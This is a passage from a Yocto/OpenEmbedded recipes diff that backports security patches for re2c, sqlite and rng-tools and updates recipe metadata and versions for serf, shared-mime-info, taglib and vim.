++ else if (re->type == RE::CAT) {
++ if (i.succ == 0) {
++ // recurse into the left sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->cat.re1, 0, 0};
++ stack.push_back(j);
++ }
++ else if (i.succ == 1) {
++ // recurse into the right sub-RE
++ StackItem k = {re, size, 2};
++ stack.push_back(k);
++ StackItem j = {re->cat.re2, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // both sub-RE visited, recursive return
++ size = i.size // left sub-RE (saved on stack)
++ + size; // right sub-RE (just visited by DFS)
++ }
++ }
++ else if (re->type == RE::ITER) {
++ if (i.succ == 0) {
++ // recurse into the sub-RE
++ StackItem k = {re, 0, 1};
++ stack.push_back(k);
++ StackItem j = {re->iter.re, 0, 0};
++ stack.push_back(j);
++ }
++ else {
++ // sub-RE visited, recursive return
++ const uint32_t min = re->iter.min, max = re->iter.max;
++ size = max == AST::MANY
++ ? size * min + 1
++ : size * max + (max - min);
++ }
++ }
++ }
++
++ //DASSERT(stack.empty());
++ return size;
++}
++
++} // anonymous namespace
+
+ size_t estimate_size(const std::vector<RE*> &res)
+ {
+- const size_t nre = res.size();
+- size_t size = nre - 1;
+- for (size_t i = 0; i < nre; ++i) {
+- size += estimate(res[i]) + 1;
+- }
+- return size;
++ std::vector<StackItem> stack;
++
++ const size_t nre = res.size();
++ //DASSERT(nre > 0);
++ size_t size = nre - 1;
++
++ for (size_t i = 0; i < nre; ++i) {
++ size += estimate_re_size(res[i], stack) + 1;
++ }
++
++ return size;
+ }
+
+ } // namespace re2c
+
diff --git a/meta/recipes-support/re2c/re2c_1.0.1.bb b/meta/recipes-support/re2c/re2c_1.0.1.bb
index 35200ecde8..ca5c33f151 100644
--- a/meta/recipes-support/re2c/re2c_1.0.1.bb
+++ b/meta/recipes-support/re2c/re2c_1.0.1.bb
@@ -1,11 +1,17 @@
SUMMARY = "Tool for writing very fast and very flexible scanners"
-HOMEPAGE = "http://re2c.sourceforge.net/"
+DESCRIPTION = "A free and open-source lexer generator for C, C++ and Go. It compiles regular expressions to determinisitic finite automata and encodes the automata in the form of a program in the target language. Unlike any other such tool, re2c focuses on generating high efficient code for regular expression matching. As a result this allows a much broader range of use than any traditional lexer."
+HOMEPAGE = "http://re2c.org/"
+BUGTRACKER = "https://github.com/skvadrik/re2c/issues"
AUTHOR = "Marcus Börger <helly@users.sourceforge.net>"
SECTION = "devel"
LICENSE = "PD"
LIC_FILES_CHKSUM = "file://README;beginline=146;md5=881056c9add17f8019ccd8c382ba963a"
-SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz"
+SRC_URI = "https://github.com/skvadrik/re2c/releases/download/${PV}/${BPN}-${PV}.tar.gz \
+file://CVE-2018-21232-1.patch \
+file://CVE-2018-21232-2.patch \
+file://CVE-2018-21232-3.patch \
+file://CVE-2018-21232-4.patch"
SRC_URI[md5sum] = "e2c6cf52fc6a21595f21bc82db5324f8"
SRC_URI[sha256sum] = "605058d18a00e01bfc32aebf83af35ed5b13180b4e9f279c90843afab2c66c7c"
UPSTREAM_CHECK_URI = "https://github.com/skvadrik/re2c/releases"
diff --git a/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
new file mode 100644
index 0000000000..3b44095cf5
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch
@@ -0,0 +1,26 @@
+From 6ce86cb5cf06541cd5aad70fe8494b07b22c247e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:10:32 +0100
+Subject: [PATCH] rngd_jitter: fix O_NONBLOCK setting for entropy pipe
+
+A pointer was passed to fcntl instead of the flags variable, setting
+random flags.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 32bac53..25b3543 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -465,7 +465,7 @@ int init_jitter_entropy_source(struct rng *ent_src)
+
+ flags = fcntl(pipefds[0], F_GETFL, 0);
+ flags |= O_NONBLOCK;
+- fcntl(pipefds[0], F_SETFL, &flags);
++ fcntl(pipefds[0], F_SETFL, flags);
+
+ if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
diff --git a/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
new file mode 100644
index 0000000000..34f8227543
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch
@@ -0,0 +1,38 @@
+From 330c2ba14510c8103b30d5021adb18f1534031a1 Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:18:09 +0100
+Subject: [PATCH] rngd_jitter: initialize AES key before setting the entropy
+ pipe to O_NONBLOCK
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 9 +++++----
+ 1 file changed, 5 insertions(+), 4 deletions(-)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 25b3543..48f344c 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -463,10 +463,6 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ pthread_mutex_unlock(&tdata[i].statemtx);
+ }
+
+- flags = fcntl(pipefds[0], F_GETFL, 0);
+- flags |= O_NONBLOCK;
+- fcntl(pipefds[0], F_SETFL, flags);
+-
+ if (ent_src->rng_options[JITTER_OPT_USE_AES].int_val) {
+ #ifdef HAVE_LIBGCRYPT
+ /*
+@@ -487,6 +483,11 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 1;
+ }
+ xread_jitter(aes_buf, tdata[0].buf_sz, ent_src);
++
++ flags = fcntl(pipefds[0], F_GETFL, 0);
++ flags |= O_NONBLOCK;
++ fcntl(pipefds[0], F_SETFL, flags);
++
+ #else
+ message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
diff --git a/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
new file mode 100644
index 0000000000..b3bc8028ea
--- /dev/null
+++ b/meta/recipes-support/rng-tools/rng-tools/0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch
@@ -0,0 +1,38 @@
+From 36bc92ef2789b13183c8895d83665f48b13c2b9e Mon Sep 17 00:00:00 2001
+From: Matthias Schiffer <matthias.schiffer@tq-group.com>
+Date: Wed, 27 Jan 2021 16:22:39 +0100
+Subject: [PATCH] rngd_jitter: always read from entropy pipe before setting
+ O_NONBLOCK
+
+Even with AES disabled, we want to make sure that jent_read_entropy() has
+already generated some entropy before we consider the the source
+initialized. Otherwise "Entropy Generation is slow" log spam will be
+emitteded until this has happened, which can take several seconds.
+
+Signed-off-by: Matthias Schiffer <matthias.schiffer@tq-group.com>
+---
+ rngd_jitter.c | 11 +++++++++++
+ 1 file changed, 11 insertions(+)
+
+diff --git a/rngd_jitter.c b/rngd_jitter.c
+index 48f344c..b736cdd 100644
+--- a/rngd_jitter.c
++++ b/rngd_jitter.c
+@@ -492,6 +492,17 @@ int init_jitter_entropy_source(struct rng *ent_src)
+ message_entsrc(ent_src,LOG_CONS|LOG_INFO, "libgcrypt not available. Disabling AES in JITTER source\n");
+ ent_src->rng_options[JITTER_OPT_USE_AES].int_val = 0;
+ #endif
++ } else {
++ /*
++ * Make sure that an entropy gathering thread has generated
++ * at least some entropy before setting O_NONBLOCK and finishing
++ * the entropy source initialization.
++ *
++ * This avoids "Entropy Generation is slow" log spamming that
++ * would otherwise happen until jent_read_entropy() has run
++ * for the first time.
++ */
++ xread_jitter(&i, 1, ent_src);
+ }
+ message_entsrc(ent_src,LOG_DAEMON|LOG_INFO, "Enabling JITTER rng support\n");
+ return 0;
diff --git a/meta/recipes-support/rng-tools/rng-tools/rngd.service b/meta/recipes-support/rng-tools/rng-tools/rngd.service
index aaaaa29074..f296a99e1f 100644
--- a/meta/recipes-support/rng-tools/rng-tools/rngd.service
+++ b/meta/recipes-support/rng-tools/rng-tools/rngd.service
@@ -3,6 +3,7 @@ Description=Hardware RNG Entropy Gatherer Daemon
DefaultDependencies=no
After=systemd-udev-settle.service
Before=sysinit.target shutdown.target
+Wants=systemd-udev-settle.service
Conflicts=shutdown.target
[Service]
diff --git a/meta/recipes-support/rng-tools/rng-tools_6.9.bb b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
index 913342c315..58b58fbb3c 100644
--- a/meta/recipes-support/rng-tools/rng-tools_6.9.bb
+++ b/meta/recipes-support/rng-tools/rng-tools_6.9.bb
@@ -9,7 +9,10 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
DEPENDS = "sysfsutils"
SRC_URI = "\
- git://github.com/nhorman/rng-tools.git \
+ git://github.com/nhorman/rng-tools.git;branch=master;protocol=https \
+ file://0001-rngd_jitter-fix-O_NONBLOCK-setting-for-entropy-pipe.patch \
+ file://0002-rngd_jitter-initialize-AES-key-before-setting-the-en.patch \
+ file://0003-rngd_jitter-always-read-from-entropy-pipe-before-set.patch \
file://init \
file://default \
file://rngd.service \
diff --git a/meta/recipes-support/serf/serf_1.3.9.bb b/meta/recipes-support/serf/serf_1.3.9.bb
index 6a27f12102..3276d40df6 100644
--- a/meta/recipes-support/serf/serf_1.3.9.bb
+++ b/meta/recipes-support/serf/serf_1.3.9.bb
@@ -1,4 +1,9 @@
SUMMARY = "High-Performance Asynchronous HTTP Client Library"
+DESCRIPTION = "The Apache Serf library is a C-based HTTP client library built upon the Apache \
+Portable Runtime (APR) library. It multiplexes connections, running the \
+read/write communication asynchronously. Memory copies and transformations are \
+kept to a minimum to provide high performance operation."
+HOMEPAGE = "http://serf.apache.org/"
SRC_URI = "${APACHE_MIRROR}/${BPN}/${BPN}-${PV}.tar.bz2 \
file://norpath.patch \
file://env.patch \
@@ -30,4 +35,9 @@ EXTRA_OESCONS = " \
OPENSSL="${STAGING_EXECPREFIXDIR}" \
"
+# scons creates non-reproducible archives
+do_install_append() {
+ rm ${D}/${libdir}/*.a
+}
+
BBCLASSEXTEND = "native nativesdk"
diff --git a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
index 7a060b09ad..05c7d32965 100644
--- a/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
+++ b/meta/recipes-support/shared-mime-info/shared-mime-info_git.bb
@@ -1,4 +1,5 @@
SUMMARY = "Shared MIME type database and specification"
+DESCRIPTION = "The shared-mime-info package contains the core database of common types and the update-mime-database command used to extend it. It requires glib2 to be installed for building the update command. Additionally, it uses intltool for translations, though this is only a dependency for the maintainers."
HOMEPAGE = "http://freedesktop.org/wiki/Software/shared-mime-info"
SECTION = "base"
@@ -7,7 +8,7 @@ LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
DEPENDS = "libxml2 itstool-native glib-2.0 shared-mime-info-native"
-SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https"
+SRC_URI = "git://gitlab.freedesktop.org/xdg/shared-mime-info.git;protocol=https;branch=master"
SRCREV = "829b26d85e7d89a0caee03046c3bce373f04c80a"
PV = "1.15"
S = "${WORKDIR}/git"
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35525.patch b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
new file mode 100644
index 0000000000..27d81d42d9
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35525.patch
@@ -0,0 +1,21 @@
+From: drh <drh@noemail.net>
+Date: Thu, 20 Feb 2020 14:08:51 +0000
+Subject: [PATCH] Early-out on the INTERSECT query processing following an
+ error.
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35525
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -130767,6 +130767,7 @@ static int multiSelect(
+ /* Generate code to take the intersection of the two temporary
+ ** tables.
+ */
++ if( rc ) break;
+ assert( p->pEList );
+ iBreak = sqlite3VdbeMakeLabel(pParse);
+ iCont = sqlite3VdbeMakeLabel(pParse);
diff --git a/meta/recipes-support/sqlite/files/CVE-2020-35527.patch b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
new file mode 100644
index 0000000000..d1dae389b0
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2020-35527.patch
@@ -0,0 +1,22 @@
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Fix a problem with ALTER TABLE for views that have a nested
+ FROM clause. Ticket [f50af3e8a565776b].
+
+Upstream-Status: Backport [http://security.debian.org/debian-security/pool/updates/main/s/sqlite3/sqlite3_3.27.2-3+deb10u2.debian.tar.xz]
+CVE: CVE-2020-35527
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+Index: sqlite-autoconf-3310100/sqlite3.c
+===================================================================
+--- sqlite-autoconf-3310100.orig/sqlite3.c
++++ sqlite-autoconf-3310100/sqlite3.c
+@@ -133110,7 +133110,7 @@ static int selectExpander(Walker *pWalke
+ pNew = sqlite3ExprListAppend(pParse, pNew, pExpr);
+ sqlite3TokenInit(&sColname, zColname);
+ sqlite3ExprListSetName(pParse, pNew, &sColname, 0);
+- if( pNew && (p->selFlags & SF_NestedFrom)!=0 ){
++ if( pNew && (p->selFlags & SF_NestedFrom)!=0 && !IN_RENAME_OBJECT ){
+ struct ExprList_item *pX = &pNew->a[pNew->nExpr-1];
+ sqlite3DbFree(db, pX->zEName);
+ if( pSub ){
diff --git a/meta/recipes-support/sqlite/files/CVE-2021-20223.patch b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
new file mode 100644
index 0000000000..e9d2e04d30
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2021-20223.patch
@@ -0,0 +1,23 @@
+From d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b Mon Sep 17 00:00:00 2001
+From: dan <dan@noemail.net>
+Date: Mon, 26 Oct 2020 13:24:36 +0000
+Subject: [PATCH] Prevent fts5 tokenizer unicode61 from considering '\0' to be
+ a token characters, even if other characters of class "Cc" are.
+
+FossilOrigin-Name: b7b7bde9b7a03665e3691c6d51118965f216d2dfb1617f138b9f9e60e418ed2f
+
+CVE: CVE-2021-20223
+Upstream-Status: Backport [https://github.com/sqlite/sqlite/commit/d1d43efa4fb0f2098c0e2c5bf2e807c58d5ec05b.patch]
+Comment: Removed manifest, manifest.uuid and fts5tok1.test as these files are not present in the amalgamated source code
+Signed-Off-by: Sana.Kazi@kpit.com
+---
+--- a/sqlite3.c 2022-09-09 13:54:30.010768197 +0530
++++ b/sqlite3.c 2022-09-09 13:56:25.458769142 +0530
+@@ -227114,6 +227114,7 @@
+ }
+ iTbl++;
+ }
++ aAscii[0] = 0; /* 0x00 is never a token character */
+ }
+
+ /*
diff --git a/meta/recipes-support/sqlite/files/CVE-2022-35737.patch b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
new file mode 100644
index 0000000000..341e002913
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2022-35737.patch
@@ -0,0 +1,29 @@
+From 2bbf4c999dbb4b520561a57e0bafc19a15562093 Mon Sep 17 00:00:00 2001
+From: Hitendra Prajapati <hprajapati@mvista.com>
+Date: Fri, 2 Sep 2022 11:22:29 +0530
+Subject: [PATCH] CVE-2022-35737
+
+Upstream-Status: Backport [https://www.sqlite.org/src/info/aab790a16e1bdff7]
+CVE: CVE-2022-35737
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ sqlite3.c | 3 ++-
+ 1 file changed, 2 insertions(+), 1 deletion(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index f664217..33dfb78 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -28758,7 +28758,8 @@ SQLITE_API void sqlite3_str_vappendf(
+ case etSQLESCAPE: /* %q: Escape ' characters */
+ case etSQLESCAPE2: /* %Q: Escape ' and enclose in '...' */
+ case etSQLESCAPE3: { /* %w: Escape " characters */
+- int i, j, k, n, isnull;
++ i64 i, j, k, n;
++ int isnull;
+ int needQuote;
+ char ch;
+ char q = ((xtype==etSQLESCAPE3)?'"':'\''); /* Quote character */
+--
+2.25.1
+
diff --git a/meta/recipes-support/sqlite/files/CVE-2023-7104.patch b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
new file mode 100644
index 0000000000..01ff29ff5e
--- /dev/null
+++ b/meta/recipes-support/sqlite/files/CVE-2023-7104.patch
@@ -0,0 +1,46 @@
+From eab426c5fba69d2c77023939f72b4ad446834e3c Mon Sep 17 00:00:00 2001
+From: dan <Dan Kennedy>
+Date: Thu, 7 Sep 2023 13:53:09 +0000
+Subject: [PATCH] Fix a buffer overread in the sessions extension that could occur when processing a corrupt changeset.
+
+Upstream-Status: Backport [https://sqlite.org/src/info/0e4e7a05c4204b47]
+CVE: CVE-2023-7104
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ sqlite3.c | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/sqlite3.c b/sqlite3.c
+index 972ef18..c645ac8 100644
+--- a/sqlite3.c
++++ b/sqlite3.c
+@@ -203301,15 +203301,19 @@ static int sessionReadRecord(
+ }
+ }
+ if( eType==SQLITE_INTEGER || eType==SQLITE_FLOAT ){
+- sqlite3_int64 v = sessionGetI64(aVal);
+- if( eType==SQLITE_INTEGER ){
+- sqlite3VdbeMemSetInt64(apOut[i], v);
++ if( (pIn->nData-pIn->iNext)<8 ){
++ rc = SQLITE_CORRUPT_BKPT;
+ }else{
+- double d;
+- memcpy(&d, &v, 8);
+- sqlite3VdbeMemSetDouble(apOut[i], d);
++ sqlite3_int64 v = sessionGetI64(aVal);
++ if( eType==SQLITE_INTEGER ){
++ sqlite3VdbeMemSetInt64(apOut[i], v);
++ }else{
++ double d;
++ memcpy(&d, &v, 8);
++ sqlite3VdbeMemSetDouble(apOut[i], d);
++ }
++ pIn->iNext += 8;
+ }
+- pIn->iNext += 8;
+ }
+ }
+ }
+--
+2.25.1
+
diff --git a/meta/recipes-support/sqlite/sqlite3.inc b/meta/recipes-support/sqlite/sqlite3.inc
index 07614bdb3e..1adc0eba66 100644
--- a/meta/recipes-support/sqlite/sqlite3.inc
+++ b/meta/recipes-support/sqlite/sqlite3.inc
@@ -1,4 +1,5 @@
SUMMARY = "Embeddable SQL database engine"
+DESCRIPTION = "A library that implements a small, fast, self-contained, high-reliability, full-featured, SQL database engine. SQLite is the most used database engine in the world. SQLite is built into all mobile phones and most computers and comes bundled inside countless other applications that people use every day"
HOMEPAGE = "http://www.sqlite.org"
SECTION = "libs"
diff --git a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
index c289affd60..0e7bcfa5a7 100644
--- a/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
+++ b/meta/recipes-support/sqlite/sqlite3_3.31.1.bb
@@ -13,9 +13,16 @@ SRC_URI = "http://www.sqlite.org/2020/sqlite-autoconf-${SQLITE_PV}.tar.gz \
file://CVE-2020-13630.patch \
file://CVE-2020-13631.patch \
file://CVE-2020-13632.patch \
+ file://CVE-2022-35737.patch \
+ file://CVE-2020-35525.patch \
+ file://CVE-2020-35527.patch \
+ file://CVE-2021-20223.patch \
+ file://CVE-2023-7104.patch \
"
SRC_URI[md5sum] = "2d0a553534c521504e3ac3ad3b90f125"
SRC_URI[sha256sum] = "62284efebc05a76f909c580ffa5c008a7d22a1287285d68b7825a2b6b51949ae"
# -19242 is only an issue in specific development branch commits
CVE_CHECK_WHITELIST += "CVE-2019-19242"
+# This is believed to be iOS specific (https://groups.google.com/g/sqlite-dev/c/U7OjAbZO6LA)
+CVE_CHECK_WHITELIST += "CVE-2015-3717"
diff --git a/meta/recipes-support/taglib/taglib_1.11.1.bb b/meta/recipes-support/taglib/taglib_1.11.1.bb
index f4e288295d..165bccadc1 100644
--- a/meta/recipes-support/taglib/taglib_1.11.1.bb
+++ b/meta/recipes-support/taglib/taglib_1.11.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Library for reading and editing the meta-data of popular audio formats"
+DESCRIPTION = "Platform-independent library (tested on Windows/Linux) for reading and writing metadata in media files, including video, audio, and photo formats. This is a convenient one-stop-shop to present or tag all your media collection, regardless of which format/container these might use. You can read/write the standard or more common tags/properties of a media, or you can also create and retrieve your own custom tags."
SECTION = "libs/multimedia"
HOMEPAGE = "http://taglib.github.io/"
LICENSE = "LGPLv2.1 | MPL-1.1"
diff --git a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
index 63a7b78f12..2fc11dbdc2 100644
--- a/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
+++ b/meta/recipes-support/vim/files/0001-src-Makefile-improve-reproducibility.patch
@@ -16,11 +16,11 @@ Signed-off-by: Mingli Yu <mingli.yu@windriver.com>
src/Makefile | 14 ++++----------
1 file changed, 4 insertions(+), 10 deletions(-)
-diff --git a/src/Makefile b/src/Makefile
-index f2fafa4dc..7148d4bd9 100644
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2845,16 +2845,10 @@ auto/pathdef.c: Makefile auto/config.mk
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -3101,16 +3101,10 @@ auto/pathdef.c: Makefile auto/config.mk
-@echo '#include "vim.h"' >> $@
-@echo 'char_u *default_vim_dir = (char_u *)"$(VIMRCLOC)";' | $(QUOTESED) >> $@
-@echo 'char_u *default_vimruntime_dir = (char_u *)"$(VIMRUNTIMEDIR)";' | $(QUOTESED) >> $@
@@ -41,6 +41,3 @@ index f2fafa4dc..7148d4bd9 100644
-@sh $(srcdir)/pathdef.sh
GUI_GTK_RES_INPUTS = \
---
-2.17.1
-
diff --git a/meta/recipes-support/vim/files/disable_acl_header_check.patch b/meta/recipes-support/vim/files/disable_acl_header_check.patch
index 33089162b4..533138245d 100644
--- a/meta/recipes-support/vim/files/disable_acl_header_check.patch
+++ b/meta/recipes-support/vim/files/disable_acl_header_check.patch
@@ -13,11 +13,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
src/configure.ac | 3 ++-
1 file changed, 2 insertions(+), 1 deletion(-)
-diff --git a/src/configure.ac b/src/configure.ac
-index 2d409b3ca06a..dbcaf6140263 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3257,7 +3257,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h string.h \
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3292,7 +3292,7 @@ AC_CHECK_HEADERS(stdint.h stdlib.h strin
sys/systeminfo.h locale.h sys/stream.h termios.h \
libc.h sys/statfs.h poll.h sys/poll.h pwd.h \
utime.h sys/param.h sys/ptms.h libintl.h libgen.h \
@@ -26,7 +26,7 @@ index 2d409b3ca06a..dbcaf6140263 100644
sys/access.h sys/sysinfo.h wchar.h wctype.h)
dnl sys/ptem.h depends on sys/stream.h on Solaris
-@@ -3886,6 +3886,7 @@ AC_ARG_ENABLE(acl,
+@@ -3974,6 +3974,7 @@ AC_ARG_ENABLE(acl,
, [enable_acl="yes"])
if test "$enable_acl" = "yes"; then
AC_MSG_RESULT(no)
@@ -34,6 +34,3 @@ index 2d409b3ca06a..dbcaf6140263 100644
AC_CHECK_LIB(posix1e, acl_get_file, [LIBS="$LIBS -lposix1e"],
AC_CHECK_LIB(acl, acl_get_file, [LIBS="$LIBS -lacl"
AC_CHECK_LIB(attr, fgetxattr, LIBS="$LIBS -lattr",,)],,),)
---
-2.7.4
-
diff --git a/meta/recipes-support/vim/files/no-path-adjust.patch b/meta/recipes-support/vim/files/no-path-adjust.patch
index 05c2d803f6..9d6da80913 100644
--- a/meta/recipes-support/vim/files/no-path-adjust.patch
+++ b/meta/recipes-support/vim/files/no-path-adjust.patch
@@ -7,9 +7,11 @@ Upstream-Status: Pending
Signed-off-by: Joe Slater <joe.slater@windriver.com>
---- a/src/Makefile
-+++ b/src/Makefile
-@@ -2507,11 +2507,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
+Index: git/src/Makefile
+===================================================================
+--- git.orig/src/Makefile
++++ git/src/Makefile
+@@ -2565,11 +2565,14 @@ installtools: $(TOOLS) $(DESTDIR)$(exec_
rm -rf $$cvs; \
fi
-chmod $(FILEMOD) $(DEST_TOOLS)/*
diff --git a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
index 37914d4cd9..5284ba45b6 100644
--- a/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
+++ b/meta/recipes-support/vim/files/vim-add-knob-whether-elf.h-are-checked.patch
@@ -14,11 +14,11 @@ Signed-off-by: Changqing Li <changqing.li@windriver.com>
src/configure.ac | 7 +++++++
1 file changed, 7 insertions(+)
-diff --git a/src/configure.ac b/src/configure.ac
-index 0ee86ad..64736f0 100644
---- a/src/configure.ac
-+++ b/src/configure.ac
-@@ -3192,11 +3192,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [int x __attribute__((unused));],
+Index: git/src/configure.ac
+===================================================================
+--- git.orig/src/configure.ac
++++ git/src/configure.ac
+@@ -3264,11 +3264,18 @@ AC_TRY_COMPILE([#include <stdio.h>], [in
AC_MSG_RESULT(no))
dnl Checks for header files.
@@ -37,6 +37,3 @@ index 0ee86ad..64736f0 100644
AC_HEADER_DIRENT
---
-2.7.4
-
diff --git a/meta/recipes-support/vim/vim-tiny_8.2.bb b/meta/recipes-support/vim/vim-tiny_9.0.bb
index e4c26d23f6..e4c26d23f6 100644
--- a/meta/recipes-support/vim/vim-tiny_8.2.bb
+++ b/meta/recipes-support/vim/vim-tiny_9.0.bb
diff --git a/meta/recipes-support/vim/vim.inc b/meta/recipes-support/vim/vim.inc
index 4d2886c19e..6d62bd67af 100644
--- a/meta/recipes-support/vim/vim.inc
+++ b/meta/recipes-support/vim/vim.inc
@@ -1,28 +1,37 @@
SUMMARY = "Vi IMproved - enhanced vi editor"
+DESCRIPTION = "Vim is a greatly improved version of the good old UNIX editor Vi. Many new features have been added: multi-level undo, syntax highlighting, command line history, on-line help, spell checking, filename completion, block operations, script language, etc. There is also a Graphical User Interface (GUI) available."
SECTION = "console/utils"
+HOMEPAGE = "https://www.vim.org/"
+BUGTRACKER = "https://github.com/vim/vim/issues"
+
DEPENDS = "ncurses gettext-native"
# vimdiff doesn't like busybox diff
RSUGGESTS_${PN} = "diffutils"
+
LICENSE = "vim"
-LIC_FILES_CHKSUM = "file://runtime/doc/uganda.txt;endline=287;md5=a19edd7ec70d573a005d9e509375a99a"
+LIC_FILES_CHKSUM = "file://LICENSE;md5=d1a651ab770b45d41c0f8cb5a8ca930e"
-SRC_URI = "git://github.com/vim/vim.git \
+SRC_URI = "git://github.com/vim/vim.git;branch=master;protocol=https \
file://disable_acl_header_check.patch \
file://vim-add-knob-whether-elf.h-are-checked.patch \
file://0001-src-Makefile-improve-reproducibility.patch \
file://no-path-adjust.patch \
-"
-SRCREV = "98056533b96b6b5d8849641de93185dd7bcadc44"
+ "
+
+PV .= ".2190"
+SRCREV = "6a950da86d7a6eb09d5ebeab17657986420d07ac"
# Do not consider .z in x.y.z, as that is updated with every commit
UPSTREAM_CHECK_GITTAGREGEX = "(?P<pver>\d+\.\d+)\.0"
+# Ignore that the upstream version .z in x.y.z is always newer
+UPSTREAM_VERSION_UNKNOWN = "1"
S = "${WORKDIR}/git"
VIMDIR = "vim${@d.getVar('PV').split('.')[0]}${@d.getVar('PV').split('.')[1]}"
-inherit autotools-brokensep update-alternatives mime-xdg
+inherit autotools-brokensep update-alternatives mime-xdg pkgconfig
CLEANBROKEN = "1"
@@ -31,29 +40,24 @@ do_configure () {
cd src
rm -f auto/*
touch auto/config.mk
+ # git timestamps aren't reliable, so touch the shipped .po files so they aren't regenerated
+ touch -c po/cs.cp1250.po po/ja.euc-jp.po po/ja.sjis.po po/ko.po po/pl.UTF-8.po po/pl.cp1250.po po/ru.cp1251.po po/sk.cp1250.po po/uk.cp1251.po po/zh_CN.po po/zh_CN.cp936.po po/zh_TW.po
+ # ru.cp1251.po uses CP1251 rather than cp1251, fix that
